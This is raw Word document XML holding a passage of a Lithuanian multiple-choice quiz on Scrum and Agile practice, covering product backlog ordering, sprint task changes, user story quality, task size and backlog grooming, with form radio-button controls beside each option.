    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>REIKALAVIMŲ ANALIZĖ YRA ITERATYVUS PROCESAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1160" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId73" w:name="DefaultOcxName4718" w:shapeid="_x0000_i1160"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Tai</w:t>
      </w:r>
      <w:r w:rsidR="00670F46" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>p,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>yra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1163" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId74" w:name="DefaultOcxName4719" w:shapeid="_x0000_i1163"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Ne, nėra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4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AIP ORGANIZUOJAMAS PRODUKTO DARBŲ SĄRAŠAS (angl. PRODUCT BACKLOG)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1166" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId75" w:name="DefaultOcxName471" w:shapeid="_x0000_i1166"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  Darbai sąraše išdėstomi atsitiktine tvarka </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1169" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId76" w:name="DefaultOcxName47" w:shapeid="_x0000_i1169"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kategorijomis pagal prioritetą - P1, P2, P3 ir t.t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1172" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId77" w:name="DefaultOcxName116" w:shapeid="_x0000_i1172"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Dideli darbai sąrašo pradžioje, smulkūs gale</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1175" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId78" w:name="DefaultOcxName214" w:shapeid="_x0000_i1175"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Svarbiausi darbai sąrašo pradžioje, mažiausiai svarbūs gale</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szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. KADA VYKSTANT SPRINTUI GALIMA PRIDĖTI NAUJAS SPRINTO UŽDUOTIS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1178" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId79" w:name="DefaultOcxName4711" w:shapeid="_x0000_i1178"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Kai produkto savininkas (product owner) identifikuoja naują užduotį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1181" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId80" w:name="DefaultOcxName4712" w:shapeid="_x0000_i1181"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Kai Scrum meistras (Scrum Master) identifikuoja naują užduotį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1184" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId81" w:name="DefaultOcxName4713" w:shapeid="_x0000_i1184"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Niekada. Sprinto užduotys yra fiksuojamos ir apsprendžiamos sprinto planavimo metu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1187" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId82" w:name="DefaultOcxName4714" w:shapeid="_x0000_i1187"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Kuo greičiau po to kai jos identifikuojamos, jei jos nekeičia darbo apimčių (scope change) siekiant užsibrėžtų sprinto tikslų (sprint goals)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1190" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId83" w:name="DefaultOcxName4715" w:shapeid="_x0000_i1190"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Kai Scrum meistras (Scrum Master) jas patvirtina</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szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>KAIP VERTINTUMĖTE TOKĮ VARTOTOJO PASAKOJIMĄ? „KAIP PARDAVIMO AGENTAS, AŠ NORIU TURĖTI KLIENTŲ PAIEŠKOS GALIMYBĘ KAD GALĖČIAU RASTI SAVO KLIENTUS GREITAI IR LENGVAI“</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1193" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId84" w:name="DefaultOcxName47141" w:shapeid="_x0000_i1193"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Gerai suformuluotas. Nereikia papildomos informacijos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="212" w:name="_Hlk12106118"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1196" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId85" w:name="DefaultOcxName47142" w:shapeid="_x0000_i1196"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Gerai suformuluotas. Reiktų paaiškinimo, ką reiškia “greitai ir lengvai” kad būtų galima testuoti vartotojo sąsają.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="212"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1199" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId86" w:name="DefaultOcxName47143" w:shapeid="_x0000_i1199"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Blogai suformuluotas. Pernelyg didelės apimties (per platus).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1311" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId87" w:name="DefaultOcxName47144" w:shapeid="_x0000_i1311"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Blogai suformuluotas. Pernelyg mažos apimties (per siauras).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc10443988"/>
      <w:bookmarkStart w:id="214" w:name="_Toc13095537"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="215" w:name="_Toc13833431"/>
      <w:bookmarkStart w:id="216" w:name="_Toc14392462"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rojekto eigos valdymo principus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc1614458763"/>
      <w:bookmarkStart w:id="218" w:name="_Toc10443989"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1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OKS SPRINTO UŽDUOTIES DYDIS LAIKOMAS TINKAMU?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1314" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId88" w:name="DefaultOcxName161" w:shapeid="_x0000_i1314"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  Viena žmogaus diena arba mažiau, kad kiti komandos nariai galėtų lengvai pastebėti, jei  užduoties įgyvendinimas užstrigo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1334" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId89" w:name="DefaultOcxName1612" w:shapeid="_x0000_i1334"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  2-3 žmonių 2-3 dienos, kad kiekvienas produkto darbų sąrašo (angl. backlog) įrašas būtų viena sprinto užduotis</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
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">KAIP DAŽNAI TURI VYKTI  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">PRODUKTO DARBŲ SĄRAŠO PERŽIŪRA (angl. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>BACKLOG GROOMING)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1336" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId90" w:name="DefaultOcxName461" w:shapeid="_x0000_i1336"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Vieną kartą, projekto pradžioje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
